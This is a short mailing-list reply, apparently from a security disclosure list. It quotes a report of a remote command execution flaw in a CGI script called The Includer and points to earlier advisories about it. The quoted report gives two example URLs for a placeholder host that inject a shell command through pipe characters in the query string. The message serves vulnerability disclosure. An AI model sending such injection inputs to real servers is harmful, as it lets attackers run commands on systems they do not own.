Hi. FA> Remote Command Execution FA> Script: The Includer ( www.smarterscripts.com/includer/ ) FA> Remote Command Execution on: FA> Example I.: www.host-vulnerable.com/includer.cgi?|id| FA> Example II.: www.host-vulnerable.com/includer.cgi?template=|id| FA> Sorry if the bug is already posted ;) It was posted a long time ago. 8)) Also we know about vulnerabilities in Includer 1.1 and Executer 1.0 Advisories: http://www.boiteam.net/?x=articles&id=8 http://www.boiteam.net/?x=articles&id=9 + article 0x09 in CodePimps #6 (http://cp.boiteam.net) -- Best regards, Xanders mailto:postbase@xxxxxxx
